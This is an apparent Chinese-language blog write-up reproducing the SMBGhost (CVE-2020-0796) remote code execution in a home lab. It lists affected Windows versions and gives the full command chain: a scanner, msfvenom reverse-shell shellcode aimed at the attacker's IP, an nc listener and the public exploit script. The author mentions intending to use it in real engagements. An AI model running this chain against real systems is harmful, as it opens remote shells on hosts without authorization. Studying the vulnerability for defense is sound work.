SMBGhost RCE(CVE-2020-0796)

 SMBGhost RCE(CVE-2020-0796)

作者 :  Noth

前言 :

筆者在實戰的過程中,有掃出來存在 SMBGhost 的漏洞,不過目前還沒有成功彈回 shell,想說自己先在本地端復現後再拿去實戰,以後再打內網滲透又多了一招,不過其實進入到內網後大部份都還是在打 Web,聽朋友說最好是能一眼看到系統就可以 RCE,看來自己的實力真的還不夠,之後再回頭打 Web。

內文 :

在實戰當中可能會遇到防火牆的狀況,可能視情況自己修改 ShellCode,相關資訊一樣擺在 Reference。

影響範圍 :
Windows 10 Version 1903 (32與64位元)
Windows 10 Version 1909 (32與64位元)
Windows Server, version 1903
Windows Server, version 1909

實作環境 :
攻擊者 : 192.168.235.148 , kali
受害者 : 192.168.235.160 , Windows 10 Version 1903

查看主機是否存在漏洞 : 
python scanner.py 192.168.235.160 

msf 生成 reverse_shell 的 ShellCode : 
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.235.148 LPORT=1234 -f python "USER_PAYLOAD"

將 exploit 的 payload 替換成生成的 ShellCode :

nc 監聽 : 
nc -lvvp 1234

執行 exploit.py :
python exploit.py -ip 192.168.235.160

成功 reverse_shell :

其實筆者還有找到另一個 PoC,不過測了一陣子發現並沒有什用,難度是必須先在受害者主機執行 calc_target_offsets.bat,然後修改裡頭 Payload (光是這一點就有難度了xD),結果就是一直 Crash,後來在 github 看到它們說了一段話 : 「我們也認為 POC 不是通用的,並且不方便用於測試和教育以外的用途是一件好事」好吧,看來真的不通用 QQ,接下來就開始實作一下 AD 的攻擊手法。

Reference : 
https://github.com/chompie1337/SMBGhost_RCE_PoC 
https://mari0er.club/post/CVE-2020-0796.html/  
https://github.com/ly4k/SMBGhost

留言

熱門文章